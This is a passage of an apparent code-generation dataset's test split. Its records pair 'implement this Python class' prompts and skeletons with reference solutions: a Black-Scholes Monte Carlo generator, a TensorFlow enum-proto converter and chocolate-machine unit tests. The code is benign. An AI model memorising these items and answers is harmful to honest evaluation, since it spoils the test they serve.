process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). 
If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000492", "length_bytes": 5988, "license_type": "no_license", "methods": [{"docstring": "Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None", "name": "__init__", "signature": "def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None)"}, {"docstring": "It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "name": "generateRealizations", "signature": "def generateRealizations(self)"}, {"docstring": "It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "name": "generateRealizationsAntitheticVariables", "signature": "def generateRealizationsAntitheticVariables(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005083", "prompt": "Implement the Python class `GenerateBlackScholes` described below.\n\nClass description:\nIn this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. 
We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\n\nMethod signatures and docstrings:\n- def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None): Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\n- def generateRealizations(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n- def generateRealizationsAntitheticVariables(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "prompted_full_text": "Implement the Python class `GenerateBlackScholes` described below.\n\nClass description:\nIn this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\n\nMethod signatures and docstrings:\n- def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None): Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\n- def generateRealizations(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. 
In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n- def generateRealizationsAntitheticVariables(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n\n<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). 
If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "revision_id": "4314e47509b05523ee547be9ba6970870f9bcde0", "skeleton": "<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). 
If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). 
If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n", "source": "the_stack_v2_python_sparse", "source_path": "Computational-finance-python/montecarlovariancereduction/antitheticvariables/generateBlackScholes.py", "source_repo": "AndreaMaz/Computational-finance-python", "split": "test", "star_events_count": 1} {"blob_id": "26248d8cfa9c6560e0d2d720c690751411c8fe8d", "bodies": ["if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\nif obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\nif obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\nraise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))", "if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\nif pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\nif pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\nraise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))"], "bodies_text": "<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "class_docstring": "Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.", "class_name": "ExternalStatePolicy", "detected_licenses": ["MIT", "Apache-2.0", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' 
% (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000493", "length_bytes": 6002, "license_type": "permissive", "methods": [{"docstring": "Convert enum to proto.", "name": "_to_proto", "signature": "def _to_proto(cls, obj)"}, {"docstring": "Convert proto to enum.", "name": "_from_proto", "signature": "def _from_proto(cls, pb)"}], "n_methods": 2, "prompt": "Implement the Python class `ExternalStatePolicy` described below.\n\nClass description:\nRepresents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\n\nMethod signatures and docstrings:\n- def _to_proto(cls, obj): Convert enum to proto.\n- def _from_proto(cls, pb): Convert proto to enum.", "prompted_full_text": "Implement the Python class `ExternalStatePolicy` described below.\n\nClass description:\nRepresents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\n\nMethod signatures and docstrings:\n- def _to_proto(cls, obj): Convert enum to proto.\n- def _from_proto(cls, pb): Convert proto to enum.\n\n<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "revision_id": "085b20a4b6287eff8c0b792425d52422ab8cbab3", "skeleton": "<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. 
See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n", "source": "the_stack_v2_python_sparse", "source_path": "tensorflow/python/data/experimental/ops/distribute_options.py", "source_repo": "graphcore/tensorflow", "split": "test", "star_events_count": 84} {"blob_id": "174ef5425da4c050a820da829e8e8bad350e1da7", "bodies": ["CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\nchoice = 'dark'\nself.chocolate_machine = ChocolateMachine(CHOICES)\nself.selection = CHOCOLATE_CHOICES[choice]", "d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\nstring_1 = self.chocolate_machine.stats(d_raw_materials)\nself.assertEqual(string_1, return_1)", "m_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = True\nbool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\nself.assertEqual(bool_1, return_1)", "m_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\nreturn_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\nbool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\nself.assertEqual(bool_1, return_1)", "chocolate_choice = 'dark'\nm_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = 'A dark chocolate bar 
dispensed!'\nstring_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\nself.assertEqual(string_1, return_1)"], "bodies_text": "<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "class_docstring": "Test class to test chocolate_machine module", "class_name": "TestChocolateMachine", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials 
functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 